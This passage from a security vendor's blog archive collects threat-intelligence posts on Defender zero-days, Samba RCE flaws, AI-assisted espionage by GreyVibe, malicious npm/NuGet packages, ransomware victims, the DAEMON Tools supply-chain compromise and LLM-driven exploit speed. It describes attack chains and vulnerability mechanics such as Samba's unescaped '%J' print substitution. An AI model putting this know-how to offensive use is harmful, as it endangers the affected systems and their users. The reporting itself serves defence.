Session Management Review: Re-evaluate multi-factor authentication (MFA) policy strength and enforcement across all critical systems. Since stolen session cookies can bypass MFA, consider implementing stricter session validity durations and re-authentication requirements for high-privilege access. Endpoint Clean-up and Re-imaging: For endpoints confirmed to have executed the malicious payload, perform thorough clean-up, which may include re-imaging affected devices to ensure complete removal of the infostealer and any persistence mechanisms. Enhanced Monitoring: Implement enhanced monitoring for the detection indicators outlined above. This includes continuous monitoring of EMS server logs, endpoint process execution, file system changes, and network traffic for suspicious activities even after patching. Review and Harden EMS Configuration: Review FortiClient EMS configuration best practices, including network segmentation of the EMS server, restricting management interface access, and ensuring all EMS-related services run with the principle of least privilege. Prompt action on these remediation steps will reduce the window of opportunity for attackers and limit the impact of this critical vulnerability. Technical Takeaways CVE-2026-35616 is a critical pre-authentication API access bypass vulnerability in FortiClient EMS, rated with a CVSS score of 9.1. It allows for privilege escalation. The vulnerability is actively exploited, allowing attackers to gain unauthorized, privileged access to FortiClient EMS servers. Exploitation involves modifying EMS configurations and policies to use its legitimate management pathways for distributing malicious Base64-encoded PowerShell scripts to managed endpoints. The primary payload is a Windows information stealer (FortiEndpoint_Patch.exe) disguised as a Fortinet update. It harvests browser-saved credentials, session cookies, and autofill data from Chromium- and Gecko-based browsers. Stolen session cookies can provide follow-on access to cloud services and internal applications, potentially circumventing multi-factor authentication (MFA). Patching FortiClient EMS to version 7.4.7 or later is the immediate remediation. However, a complete compromise assessment and credential rotation are crucial due to active exploitation. --- ## Microsoft Defender Three Zero-Days Exploited - URL: https://purple-ops.io/blog/microsoft-defender-three-zero-days-exploited - Date: 2026-05-29 - Category: Threat Intelligence - Tags: microsoft-defender, zero-day, windows-vulnerabilities, active-exploitation, chaotic-eclipse - Reading time: 5 min **Summary:** Microsoft confirms three Defender zero-days (CVEs 33825, 41091, 45498) are actively exploited after public disclosure, threatening Windows users. Microsoft Defender Three Zero-Days Exploited Microsoft faces controversy after the uncoordinated public disclosure of six Windows zero-day vulnerabilities by a researcher operating under the alias Chaotic Eclipse (also known as Nightmare-Eclipse). The technology giant confirms that at least three of these flaws - BlueHammer (CVE-2026-33825), RedSun (CVE-2026-41091), and UnDefend (CVE-2026-45498) - affecting Microsoft Defender and BitLocker components, are currently under active exploitation, which directly threaten Microsoft's customers. This series of disclosures has started a debate about responsible vulnerability reporting, particularly as the researcher's accounts on GitHub and GitLab were then removed. The incident shows the ongoing tension between security researchers seeking prompt vendor action and software providers advocating for Coordinated Vulnerability Disclosure (CVD). Microsoft has publicly expressed strong opposition to these uncoordinated releases, stating that publishing proof-of-concept code for unpatched vulnerabilities introduces "unnecessary risk." The company's security teams have been working intensively to understand the impact, protect customers, and develop security updates for these issues. This news examines the details of these Windows zero-days, patches for Samba enterprise file servers, the GreyVibe threat group's use of AI in cyberespionage against Ukrainian entities, and a wave of software supply chain attacks using malicious NuGet and npm packages to steal sensitive credentials and cloud secrets from developers globally. What zero-day vulnerabilities were publicly disclosed, and how are they being exploited? The researcher Chaotic Eclipse publicly disclosed details for six zero-day vulnerabilities impacting various Windows components. Microsoft has confirmed that three of these, BlueHammer (CVE-2026-33825), RedSun (CVE-2026-41091), and UnDefend (CVE-2026-45498), are actively being exploited in attacks targeting users of Microsoft Defender and other Windows functionalities. The other three disclosed flaws are YellowKey (CVE-2026-45585), GreenPlasma, and MiniPlasma, which primarily affect BitLocker and other Windows mechanisms. BlueHammer (CVE-2026-33825) is a vulnerability in Microsoft Defender that has been actively exploited. Details surrounding its exploitation indicate methods allowing attackers to bypass security measures within the endpoint protection platform, which can facilitate further system compromise. This flaw shows the need for continuous monitoring and rapid patching of core security software. RedSun (CVE-2026-41091) and UnDefend (CVE-2026-45498) also pertain to Microsoft Defender and other Windows components, and both have confirmed active exploitation. While specific details of their in-the-wild exploitation remain limited, their active status signals that threat actors are using these weaknesses to circumvent defensive controls. These vulnerabilities often lead to privilege escalation or arbitrary code execution within affected systems. YellowKey (CVE-2026-45585), GreenPlasma, and MiniPlasma primarily impact BitLocker and other Windows privilege escalation avenues. YellowKey (CVE-2026-45585) is described as a BitLocker bypass vulnerability, which can allow unauthorized access to encrypted data. The specific methods of exploitation for GreenPlasma and MiniPlasma involve local privilege escalation, enabling lower-privileged users to gain SYSTEM-level access on fully patched Windows systems. The public release of proof-of-concept code for these vulnerabilities, particularly those actively exploited, poses a greater risk to organizations and individual users, as it provides malicious actors with blueprints for attack. The public disclosures by Chaotic Eclipse were made after the researcher alleged a breakdown in Microsoft's handling of the vulnerability disclosure process, citing a lack of communication and reward. In response, Microsoft reiterated its commitment to Coordinated Vulnerability Disclosure (CVD), stating that such uncoordinated disclosures create "unnecessary risk" for customers. The fallout from these events included the removal of Chaotic Eclipse's GitHub account, followed by the blocking of a newly created GitLab account where the exploit code had been re-uploaded, and escalated the dispute between the researcher and the vendor. The researcher has also indicated plans for further disclosures on July 14, 2026. What vulnerabilities affect Samba installations globally? The Samba Team has released security patches to address several vulnerabilities, including two remote code execution (RCE) flaws with a maximum CVSS score of 10.0, affecting Samba enterprise file servers worldwide. These patches are important for safeguarding corporate data and preventing unauthenticated attackers from gaining full control of affected domains. Deploying the official vendor fixes is needed to reduce these risks. The two most severe vulnerabilities are: CVE-2026-4480: This flaw affects the printing subsystem across all previous Samba software versions. It arises when print servers use a specific command line substitution option, allowing Samba to pass client-controlled job description strings to the 'print command' setting via the '%J' substitution character without properly escaping shell meta characters. This oversight enables guest users to execute arbitrary scripts on the host environment without any prior authentication, and directly compromising the system. CVE-2026-4408: This vulnerability exposes the platform's core password verification mechanism in classic domain controllers that run a non-standard background process as a system service. The system processes client-supplied usernames within an internal check script without filtering input tokens. Malicious actors can exploit this raw string handling to gain system privileges remotely, making it a serious threat to the integrity of domain controllers. These security updates also address several high-severity issues: CVE-2026-1933: This shows missing authorization checks during file reparse point processing, allowing users to convert normal files into functional symbolic links on read-only network shares, which can circumvent access controls. CVE-2026-3012: This flaw poses risks during automatic certificate enrollment routines. Domain members are observed fetching certificate chains over unencrypted HTTP channels instead of secure LDAP links, enabling local attackers to intercept cleartext traffic and install malicious root certificates. CVE-2026-3238: An unauthenticated denial of service (DoS) vulnerability allows an attacker to send a corrupted UDP packet to trigger a null pointer dereference, causing the Active Directory WINS server component to crash instantly. CVE-2026-2340: Found within the immutable storage module, this flaw permits local users to overwrite protected files by manipulating file rename functions, compromising data integrity. To eliminate these Samba vulnerabilities, administrators must upgrade their deployments to versions 4.22.10, 4.23.8, or 4.24.3. Manual workarounds, such as removing specific characters from print configuration files, can be applied if immediate patching is not feasible. How is the GreyVibe threat group using AI in its cyberespionage campaigns? The GreyVibe threat group, a likely Russian-speaking entity, is using AI tools, including ChatGPT, Ideogram AI, and Google Gemini, to generate highly realistic lures and custom malware for its cyberespionage campaigns. Active since at least August 2025, the group primarily targets Ukrainian and Ukraine-related organizations across military, government, civilian, and business sectors. This use of AI allows GreyVibe to craft diverse attack chains, increasing their success rate. GreyVibe's use of AI is evident in the quality and variety of their social engineering tactics, which include: PhantomMail: Spear-phishing emails delivering malicious ZIP/RAR archives via Google Drive and 4sync links. These emails use decoy PDFs or fake error messages while deploying malware and impersonate Ukrainian government, emergency, telecom, and energy entities. PhantomClick: Fake CAPTCHA/ClickFix pages disguised as Zoom and LAPAS sites, tricking victims into executing self-infecting commands through deceptive Cloudflare verification prompts. PrincessClub: Fake Ukrainian adult/dating websites that deliver FallSpy Android spyware and PhantomRelay/LegionRelay Windows malware. Operators behind these sites use fake female Telegram personas and have incorporated WebRTC-based live calls to capture victim audio/video. DroneLink: Counterfeit Ukrainian military charity websites themed around FPV drones and UAVs, sharing infrastructure and tooling with PrincessClub campaigns. Nebo: Fake "СПО НЕБО" Russian military communications login pages, designed to mislead Ukrainian military personnel into believing they are accessing a legitimate Russian military terminal. The group's custom malware, including obfuscators like LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, as well as the LegionRelay PowerShell-based Remote Access Trojan (RAT), were likely developed with AI assistance. LegionRelay enables file theft, screenshot capturing, browser credential theft, Telegram and WhatsApp data exfiltration, and RDP access setup. Another RAT, PhantomRelay, supports system fingerprinting, dynamic script loading, and PowerShell/Windows command execution. The FallSpy Android spyware deployed in PrincessClub and Nebo campaigns collects intelligence, such as contact lists, call logs, device information, location data, media files, and SIM information. Despite the sophistication, WithSecure researchers note that GreyVibe exhibits some inconsistencies not typical of mature nation-state actors, such as uploading development samples to public scanning platforms and deploying cryptocurrency miners on some victim machines. This suggests a hybrid nature, potentially involving current or former cybercriminal actors absorbed into or working independently with state-directed tasking, and aligns with trends in Russia-linked cyber campaigns. For more information on such activities, refer to PurpleOps' analysis of malware campaigns by Russian hackers. What new supply chain attacks target developer ecosystems with malicious packages? Recent cybersecurity research shows a surge in software supply chain attacks, with malicious packages actively infiltrating both the NuGet and npm registries to steal banking credentials and cloud secrets from developers. These campaigns demonstrate threat actors' sophistication beyond simple typosquatting, using manufactured legitimacy to compromise development workflows. One incident involves a malicious NuGet package named "Sicoob.Sdk" (versions 2.0.0 through 2.0.4), which masqueraded as a C# software development kit for Sicoob, one of Brazil's largest cooperative financial systems. This package was designed to exfiltrate sensitive information, including client IDs, PFX certificates (used for authenticating businesses with the Sicoob banking network), and raw Boleto API responses. The package, downloaded nearly 500 times, was even surfaced by Google Search AI Mode as a legitimate library, increasing its reach to unsuspecting developers. The profile behind the package, "sicoob," also listed 11 other NuGet packages with approximately 6,000 collective downloads. The Microsoft Defender Security Research Team identified 14 malicious npm packages published by a single threat actor, "vpmdhaj" (a39155771@gmail.com), on May 28, 2026. These packages typosquatted well-known OpenSearch, ElasticSearch, DevOps, and environment-configuration libraries. Their primary goal was to harvest sensitive data such as AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD pipeline secrets from compromised host environments through a purpose-built credential harvester launched via a preinstall hook. Examples of these packages include "@vpmdhaj/devops-tools" and "app-config-utility". These specific attacks are part of a broader trend of supply chain compromises that have seen other campaigns emerge: 164 malicious npm packages across five scoped namespaces, featuring a postinstall payload that downloads and executes second-stage JavaScript, exfiltrating victim environment variables. 141 malicious npm packages published between May 7 and 27, 2026, which abuse npm as free static hosting for an ad-monetized web proxy, serving popunder ads to those accessing the pages. A malicious npm package called "forge-jsxy," assessed as a continuation of the "forge-jsx" campaign, capable of keylogging, clipboard monitoring, .env scanning, shell history exfiltration, host inventory, remote filesystem access, screenshot capture, and cryptocurrency wallet scanning. 176 malicious npm packages employing dependency confusion by using high version numbers (99.99.99) to distribute a postinstall script that fingerprints the host, downloads platform-specific JavaScript payloads, conducts reconnaissance, exfiltrates credentials and developer secrets, and runs second-stage binaries. The threat actor TeamPCP (also known as Replicating Marauder and UNC6780) has been identified as a key actor in these supply chain attacks, poisoning popular developer tooling across npm, PyPI, Docker Hub, and Packagist in a worm-like fashion. Their tactics involve exploiting automation and inherited trust within CI/CD workflows to push compromises further downstream, enabling victim-to-victim expansion. This reflects a shift where attackers design plausible and operationally routine package names to blend into modern software ecosystems, which makes detection challenging. Technical Takeaways Three Windows zero-day vulnerabilities (CVE-2026-33825, CVE-2026-41091, CVE-2026-45498) affecting Microsoft Defender and BitLocker are under active exploitation following uncoordinated public disclosure by Chaotic Eclipse. Samba has released patches for two Remote Code Execution vulnerabilities (CVE-2026-4480, CVE-2026-4408) with CVSS 10.0 scores, along with several high-severity access control and DoS flaws, requiring updates to versions 4.22.10, 4.23.8, or 4.24.3. The GreyVibe threat group, a likely Russian-linked entity, is using AI tools such as ChatGPT and Google Gemini to create spear-phishing lures and custom malware (e.g., LegionRelay, FallSpy) targeting Ukrainian organizations. Ongoing software supply chain attacks involve malicious NuGet (Sicoob.Sdk, ~500 downloads) and npm (14 packages from vpmdhaj) packages, designed to steal banking credentials, PFX certificates, AWS credentials, and CI/CD pipeline secrets from developers. Threat actors are increasingly using "manufactured legitimacy" in package naming and exploiting automated CI/CD workflows to cause widespread compromise in developer ecosystems, seen with groups like TeamPCP. --- ## Everest Ransomware Targets Healthcare, Utilities (7 Victims) - URL: https://purple-ops.io/blog/everest-ransomware-healthcare-utilities - Date: 2026-05-28 - Category: Ransomware Report - Tags: everest-ransomware, ransomware, healthcare-cybersecurity, critical-infrastructure - Reading time: 5 min **Summary:** Everest ransomware remains the most active threat, targeting healthcare and utility sectors with 7 recent victims, driving current attack trends. Everest Ransomware Targets Healthcare, Utilities (7 Victims) Statistical Overview Victim Totals This month: 720 This quarter: 1498 Year to date: 4123 Last 24h: 31 Quarterly Breakdown Q1: 2631 | Q2: 1498 | Q3: 0 | Q4: 0 Ransomware activity shows a significant count for Q1, with Q2 maintaining consistent but lower activity. This indicates persistent threat actor operations across diverse sectors. The current period's observed victim count of 31 reflects ongoing, targeted ransomware campaigns. Introduction Recent ransomware activity saw 31 new victims across various sectors. Groups like Everest (7 victims), Qilin (5 victims), Akira (4 victims), and DragonForce (4 victims) were primary drivers. The United States remains the most targeted country. Industries such as healthcare, manufacturing, construction, hospitality, and legal services were affected. This period shows diverse threats with varied TTPs and an ongoing shift towards data exfiltration-focused extortion. Ransomware Summary Table #GroupVictims (24h)Sample VictimsGeosSectors 1Everest7Advanced psychiatry associates, Akm, L&p aesthetics (+4)Netherlands, KuwaitEnergy & Utilities, Healthcare 2Qilin5Mainstreet organization of realtors, Otthon centrum, Roofing solutions (+2)United States, United KingdomConstruction & Engineering, Hospitality & Travel 3Akira4Alpine aerotech, General doors, Gs yuasa lithium power (+1)Germany, United StatesManufacturing, Retail & Ecommerce 4DragonForce4Ksmart.ca, Northbridge.com, President container group (+1)United States, United KingdomConstruction & Engineering, Manufacturing 5Krybit2Motofrenos.com, Smile-siam.comThailand, ColombiaManufacturing 6Medusa Locker2Mairie thiverval grignon demo, SitgroupFrance, ItalyManufacturing, Government / Public Sector 7Nova (RALord)2Casasafer, My english house academySpain, ItalyHospitality & Travel, Education 83AM1Amc.org.auAustraliaEducation 9CMD1Hospice SavannahUnited StatesHealthcare 10Chaos1Sterlingindustries.comCanadaManufacturing 11INC Ransom1lawantsSpainLegal 12LockBit1guBrazilLegal Everest was the most active group, targeting healthcare and energy sectors, including "Advanced psychiatry associates" and "L&p aesthetics." Qilin and Akira also showed significant activity across construction, hospitality, and manufacturing. Victims included "Hospice Savannah" by CMD ransomware, which shows continued threats to the healthcare sector, and "Mairie thiverval grignon demo" by Medusa Locker, impacting a government entity. For more details on DragonForce's activities in real estate and healthcare, refer to our analysis on DragonForce Ransomware Targeting. Victim Distribution By Country United States: 11 Germany: 3 Canada: 3 Spain: 2 United Kingdom: 2 Italy: 2 Thailand: 1 Australia: 1 Netherlands: 1 Kuwait: 1 By Industry Medical Practices: 2 Real Estate: 2 Manufacturing: 2 Hospitality: 2 Construction: 2 Legal Services: 2 Education: 1 Venture Capital and Private Equity: 1 Packaging and Containers Manufacturing: 1 Oil and Gas Data Analytics: 1 The United States continues to see the most ransomware attacks, with broad distribution across several industries; none significantly dominate. This suggests less concentrated sector-specific campaigns and more opportunistic or diverse targeting by various ransomware operators, consistent with previous observations of groups like Qilin and DragonForce, as shown in our recent ransomware victim updates. Ransomware News Topline The current period shows changes in cyber extortion, with a continued shift from data encryption to pure data exfiltration and diverse, sophisticated attack methods. Campaigns & Operations Silent Ransom Group operatives are increasingly engaging in in-person cyber extortion, physically appearing at victim offices to facilitate intrusions, often targeting law firms. The ShinyHunters gang, also known as Bling Libra, confirmed a social-engineering data breach affecting nearly 6 million Carnival Cruise customers, exfiltrating PII. Latin American cybercriminal groups are aggressively shifting towards exfiltrating government databases, with incidents like La Pampa Leaks affecting Uruguay's identity service and Chronus Group targeting Mexican government agencies. A ransomware incident at Wohnungsgenossenschaft Neukölln in Germany encrypted core property-management and financial systems, disrupting tenant services. Vulnerabilities & TTPs An analysis of Akira ransomware kill chains reveals initial access via brute-forcing forgotten local SSLVPN accounts lacking MFA. This is followed by lateral movement via RDP, credential access, and defense evasion, including security log clearance and shadow copy deletion. The broader cyber extortion economy shows a pivot, with extortion-only campaigns rising as threat actors use SaaS abuse, supply-chain compromises, and rapid data exfiltration, frequently bypassing traditional encryption methods. The FBI also warns about physical intrusion tactics by Silent Ransom Group, using methods like USB insertion or pressuring staff for remote sessions, often exfiltrating data via legitimate utilities like WinSCP or Rclone without encryption. Analyst Note These developments show the increasing sophistication and diversification of threat actor methods, from physical intrusions to advanced data exfiltration. This requires defensive strategies across both digital and physical security domains. Technical Takeaways Implement Phishing-Resistant MFA: Crucial for all remote access points (e.g., SSLVPN) and administrator accounts to mitigate brute-force and credential stuffing attacks. Enhance Data Exfiltration Detection: Deploy end-to-end Data Loss Prevention (DLP) across cloud, endpoint, and network environments to detect rapid data theft, especially given the pivot from encryption. Strengthen Network Segmentation and Backup Integrity: Rigorous network segmentation limits lateral movement, while immutable offline backups ensure recovery capabilities even if primary systems are compromised. Correlate Perimeter and Endpoint Logs: Integrate and analyze logs from firewalls (e.g., SSLVPN syslog) and endpoint events (e.g., Windows EVTX) with synchronized NTP to reconstruct full kill chains and identify anomalous activity. Prepare for Physical Intrusion Vectors: Develop and rehearse incident response plans that account for in-person social engineering tactics, including policies for unidentified individuals and unauthorized device connections. --- ## DAEMON Tools CVE-2026-8398 Supply Chain (CVSS 9.3) - URL: https://purple-ops.io/blog/daemon-tools-cve-2026-8398-supply - Date: 2026-05-28 - Category: CVE Analysis - Tags: daemon-tools, cve-2026-8398, supply-chain-attack, rat, trojan - Reading time: 5 min | CVSS: 9.3 **Summary:** DAEMON Tools supply chain compromise (CVE-2026-8398, CVSS 9.3) involved trojanized binaries signed with a legitimate certificate. DAEMON Tools CVE-2026-8398 Supply Chain (CVSS 9.3) AVB Disc Soft, the vendor of DAEMON Tools software, recently experienced a supply chain compromise, identified as CVE-2026-8398. This vulnerability, with a CVSS v4 score of 9.3, is a severe threat caused by unauthorized tampering with legitimate software binaries. The software supply chain's integrity was directly impacted, leading to the distribution of trojanized installers. Threat actors gained illicit access to AVB Disc Soft's build or distribution infrastructure. This access allowed them to inject malicious code into three DAEMON Tools binaries: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. These poisoned files were then digitally signed with the legitimate AVB Disc Soft code-signing certificate, making them appear authentic and helping them evade standard signature-based detection mechanisms. CVE-2026-8398 is included in the CISA Known Exploited Vulnerabilities (KEV) Catalog, which shows its widespread impact. This designation confirms active exploitation and mandates urgent remediation for Federal Civilian Executive Branch (FCEB) agencies. Its inclusion in the KEV Catalog means this compromise poses an immediate and serious risk to any organization or individual using the affected DAEMON Tools versions. What is CVE-2026-8398 and why is it critical? CVE-2026-8398 identifies a severe supply chain vulnerability in DAEMON Tools software, with a CVSS v4 score of 9.3, caused by the compromise of the vendor's build and distribution infrastructure. The issue is critical because a supply chain attack abuses trust: seemingly legitimate software delivers malicious payloads, bypassing typical security controls meant to validate software authenticity. Threat actors gained unauthorized access to AVB Disc Soft's development or distribution environment. This allowed them to modify the official DAEMON Tools software packages, injecting malicious code into DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. Distributing these trojanized binaries, which kept their legitimate digital signatures from AVB Disc Soft, created a deceptive infection method. Users installing these compromised versions unknowingly introduced malware into their environments. The high CVSS score reflects the broad impact, ease of exploitation, and serious consequences for confidentiality, integrity, and availability. Impact An attacker exploiting CVE-2026-8398 can achieve extensive system compromise, including reconnaissance, persistent remote access, and data exfiltration. The primary risk is the deployment of a modular Python-based Remote Access Trojan (RAT). This RAT can fingerprint the host system and establish a persistent command-and-control (C2) channel, including mapping Active Directory environments. This access allows adversaries to encrypt stolen data and await further operator commands, enabling various post-exploitation activities. Such a compromise has severe consequences. Organizations face risks of major data breaches, intellectual property loss, and extensive network disruption. Individual users may experience credential theft, surveillance, and their systems could be used in larger botnets or attack infrastructure. Because the attack exploited the supply chain, any entity that installed DAEMON Tools software during the compromise period is a potential victim, regardless of their internal security. The malicious software arrived appearing legitimate, so the trust placed in signed software was used against users, creating a major challenge for detection and response. Exploitation Chain The CVE-2026-8398 exploitation chain begins with a compromise of the software vendor's infrastructure, not a direct attack on end-users. Threat actors first gained unauthorized access to AVB Disc Soft's build or distribution environment. This important step allowed them to manipulate the software before it reached users. Once inside, the attackers trojanized three DAEMON Tools binaries: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. They injected malicious code into these executables, making them tools for malware delivery. The deceptive aspect of this attack is that these trojanized files were then digitally signed with AVB Disc Soft's legitimate code-signing certificate. This digital signature made the malicious installers appear trustworthy to operating systems and many endpoint security solutions, allowing them to bypass typical signature-based detections and security prompts. As discussed in our analysis of supply chain attacks involving poisoned software, using legitimate signing certificates is a recurring tactic that reduces trust and makes detection difficult. When a user downloads and executes these compromised DAEMON Tools installers, a multi-stage infection process begins. The malicious code within the trojanized binaries first deploys a VBScript loader. This loader acts as an initial access point, fetching and executing the primary payload. The ultimate payload is a modular Python-based Remote Access Trojan (RAT). This RAT is designed for stealth and persistence. It performs reconnaissance by fingerprinting the infected host and mapping the Active Directory environment if present. It then establishes a persistent command-and-control (C2) communication channel, encrypting any stolen data before exfiltrating it and awaiting further instructions from the attackers. This approach ensures covert operation and sustained access to the compromised system. Affected Products and Versions The CVE-2026-8398 vulnerability impacts DAEMON Tools software because a supply chain compromise affected its official binaries. The core components identified as trojanized are: DTHelper.exe DiscSoftBusServiceLite.exe DTShellHlp.exe Research indicates that attackers gained unauthorized access to the vendor's build or distribution infrastructure and then tampered with these executables. This means any version of DAEMON Tools software distributed from the compromised infrastructure during the attack period, which included these trojanized binaries, is affected. While precise version numbers are not detailed in available intelligence, users should consider any installation of DAEMON Tools software that occurred after the infrastructure compromise and before clean versions were released or the certificate was revoked as potentially affected. The compromise relates to the integrity of the distributed software package rather than a flaw within the software's code. Detection Detecting the CVE-2026-8398 compromise requires a multi-layered approach. This approach focuses on identifying anomalous behavior instead of relying solely on signature-based detection of the legitimately signed, trojanized binaries. Analysts and engineers should implement full monitoring strategies. Endpoint Detection and Response (EDR) Queries: Monitor for VBScript files (.vbs) executing from the DAEMON Tools installation path or directories where legitimate installers extract temporary files. Unusual VBScript activity, especially that which initiates PowerShell or Python processes, is suspicious. Look for unexpected execution of Python interpreter binaries (e.g., python.exe, pythonw.exe) from non-standard locations, especially if associated with DAEMON Tools processes or after installation, as this indicates RAT execution. Identify processes spawned by DTHelper.exe, DiscSoftBusServiceLite.exe, or DTShellHlp.exe that are not typical for disc imaging software, such as network connections to suspicious external IPs, file writes to unusual directories, or process injection attempts. Search for newly created files or modifications in system directories related to persistence mechanisms (e.g., registry run keys, startup folders) initiated by DAEMON Tools components or directly by Python processes. Monitor for attempts to enumerate Active Directory (AD) information or perform host fingerprinting activities originating from Python processes. This could involve queries to AD services or collection of detailed system configuration data. Network Indicators: Analyze network logs for outgoing C2 communications from systems running DAEMON Tools software to unusual or unknown IP addresses and domains. The Python RAT encrypts stolen data before transmission, so look for abnormal data volumes or unusual protocols to external endpoints. Monitor for DNS requests to newly observed or suspicious domains made by processes related to DAEMON Tools or Python. Implement network segmentation to limit lateral movement capabilities of a compromised host. Log Signatures and System Artifacts: Review Windows Event Logs for security events related to certificate validation failures. Although legitimate signing complicates this initially, post-revocation, any attempt to execute these binaries should trigger alerts if OCSP/CRL checks are enforced. Examine file system timestamps and attributes for anomalies in the DAEMON Tools installation directory. Unexpectedly recent modifications to core executables, or additional, unrecognized files, could indicate tampering. Check for the presence of the specific trojanized binary hashes. While the initial legitimate signing might bypass basic checks, if the original clean hashes are known, any deviation indicates compromise. Use threat intelligence feeds for Indicators of Compromise (IOCs) associated with the modular Python RAT, including C2 domains, IP addresses, and specific file hashes. Code-Signing Certificate Monitoring: Ensure real-time Online Certificate Status Protocol (OCSP) or Certificate Revocation List (CRL) checks are enforced at execution time for all signed executables. This is important for detecting when the compromised certificate has been revoked. Without real-time checks, revocation provides limited protection. Proactive detection requires continuous vigilance, integrating EDR telemetry with network and log analysis to identify subtle deviations that show a supply chain compromise like CVE-2026-8398. Remediation Remediating the CVE-2026-8398 supply chain compromise requires immediate and complete action to contain, eradicate, and prevent future infections. Given the nature of a trojanized installer signed with a legitimate certificate, standard patching alone may not suffice without forensic validation. Patch and Reinstall Clean Versions: Obtain and deploy the latest, verified clean versions of DAEMON Tools software directly from the official vendor website, ensuring no intermediary downloads are used. This assumes AVB Disc Soft has remediated its infrastructure and is distributing untampered binaries. Before reinstalling, all existing installations of DAEMON Tools deployed during the suspected compromise window must be completely uninstalled and their directories cleaned to ensure no lingering malicious components remain. If available, deploy vendor-provided tools or instructions for verifying the integrity of the installed software and system post-remediation. System Isolation and Forensic Analysis: Immediately isolate all systems suspected of having installed the trojanized DAEMON Tools software. This prevents lateral movement and further data exfiltration. Conduct a complete forensic analysis on all potentially compromised systems. This should include memory forensics, disk image analysis, and network traffic review to identify the complete extent of the infection, any data exfiltrated, and potential persistence mechanisms established by the Python RAT. Identify and remove all components of the Python RAT, including loaders, configuration files, and any modifications to the system (e.g., scheduled tasks, registry entries, new user accounts) that provide persistence or privilege escalation. Certificate Revocation and Reissuance: The compromised code-signing certificate (registered under Xiamen Lunwei Huage Network Co.(Sectigo), Ltd.) used to sign the malicious binaries has been revoked. Organizations should verify that their systems enforce OCSP or CRL checks to honor this revocation and prevent future execution of old, compromised binaries. AVB Disc Soft must work with the Certificate Authority to revoke any other potentially compromised certificates and issue new ones for future software releases. Organizations should be prepared to update their trust stores accordingly. Enhanced Supply Chain Security: Implement and enforce Software Bill of Materials (SBOM) practices to maintain an inventory of all components, dependencies, and their origins within applications. Establish strict third-party software validation procedures, including independent security audits and integrity checks for all software consumed by the organization. Consider implementing application whitelisting solutions that restrict software execution to only approved binaries, preventing unauthorized code from running, even if signed. Strengthen developer and build environment security, including multi-factor authentication, least privilege access, and continuous monitoring for anomalous activities within infrastructure related to software development and distribution. Account and Credential Review: Assume that any credentials on compromised systems may have been exfiltrated. Force a password reset for all user accounts and service accounts that had access to affected machines. Review and rotate API keys and other secrets stored on or accessible from compromised systems. Technical Takeaways CVE-2026-8398 is a supply chain compromise impacting DAEMON Tools software (CVSS v4: 9.3). Attackers gained access to AVB Disc Soft's infrastructure, trojanizing DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. The malicious binaries were digitally signed with a legitimate certificate, enabling them to bypass signature-based endpoint detection. Exploitation leads to the deployment of a modular Python-based Remote Access Trojan (RAT) for reconnaissance, Active Directory mapping, and command-and-control (C2). The incident shows the urgent need for strong supply chain security practices and real-time validation of software integrity, beyond just digital signatures. --- ## AI Exploit Development Speeds to 0.5 Days - URL: https://purple-ops.io/blog/ai-exploit-development-speeds - Date: 2026-05-28 - Category: Threat Intelligence - Tags: ai, exploit-development, vulnerability-management, threat-intelligence, cve - Reading time: 5 min **Summary:** AI accelerates exploit development to 0.5 days, creating critical visibility gaps for security teams struggling with traditional detection methods. AI Exploit Development Speeds to 0.5 Days Research by Cogent Research shows exploit development has accelerated due to artificial intelligence. Threat actors can now generate working exploits for common vulnerabilities and exposures (CVEs) in 0.5 days, a significant reduction from the average of 125.3 days in January 2025. This quick exploit generation creates detection and response challenges for security teams worldwide, impacting thousands of CVEs across platforms. The analysis, which covered 69,159 CVEs, found that traditional vulnerability scanners from vendors like Tenable, Qualys, and Rapid7 struggle to keep pace with this faster exploit timeline. 83.2% of critical vulnerabilities had a "visibility gap," meaning exploits were active before detection signatures were available. This trend changes defensive strategies, demonstrating that proactive threat intelligence and continuous software inventory analysis are needed to counter threats driven by AI. This roundup details the disruption of the GlassWorm malware campaign, which targeted software developers and compromised over 300 GitHub repositories through supply chain attacks. A newly identified financially motivated threat actor, JINX-0164, uses social engineering and custom macOS malware to target cryptocurrency organizations, showing persistent and adaptable tactics. A critical Remote Code Execution (RCE) vulnerability in the Windows DNS Client with a CVSS score of 9.8 now has a public proof-of-concept (PoC) exploit released, increasing risk for affected systems. How Quickly is AI Developing Exploits for Known Vulnerabilities? AI develops exploits for known CVEs in an average of 0.5 days, a significant decrease from 125.3 days in January 2025. Cogent Research measured this acceleration by analyzing 69,159 common vulnerabilities and exposures, focusing on 57,860 CVEs published in 2025 and 2026. The research indicates that widely available large language models (LLMs) can now process patch diffs (code changes published when a software vulnerability is fixed) and generate functional proof-of-concept (PoC) exploits. This capability marks a major change in how quickly vulnerabilities can be weaponized. The impact of this faster exploit generation on traditional vulnerability management is significant. Cogent Research identified that 83.2% of critical vulnerabilities created a "visibility gap" for defenders. More than half of critical CVEs (55.7%) never received detection coverage from major scanning technologies. Among the vulnerabilities that did eventually receive signatures, 62% already had exploits circulating before detection became available. This shows that relying on conventional scanning cycles is increasingly insufficient against current threats. Leading commercial scanning technologies, including Tenable, Qualys, and Rapid7, showed varying response times. Tenable recorded a median detection lag of 0.1 days after disclosure, Qualys 2.9 days, and Rapid7 5.1 days. However, even with quick responses, exploits often preceded detection. For critical CVEs, 62.5% were exploited before Tenable's signatures shipped, 64.5% before Qualys', and 73.5% before Rapid7's. This data suggests the challenge comes from scanner vendor detection latency, not only organizational scanning frequency. The future outlook indicates further shortening of exploit development timelines. Geng Sng, co-founder and CTO of Cogent Security, stated that the observed 0.5-day exploit development will become the baseline once Anthropic's Claude Mythos becomes widely accessible. This AI is reported to develop working exploits at the level of an experienced security researcher, with its proliferation anticipated within six to twelve months. This capability, often seen with agentic AI threats, alters the timeline for zero-day exploitation and overall threat response. To counter this trend, Cogent Research recommends that organizations implement software inventory analysis as an early warning layer. This involves continuously mapping software assets against newly disclosed CVEs within minutes of publication, enabling proactive mitigation before scanner signatures are available. Developing a parallel detection path, integrating software bill of materials (SBOM) matching with threat intelligence feeds, offers a quicker way to identify affected assets. This rapid generation of exploits by AI shows the need for new breach detection mechanisms, moving beyond traditional scanner reliance. Which Financially Motivated Group Targets Cryptocurrency Developers with Custom macOS Malware? 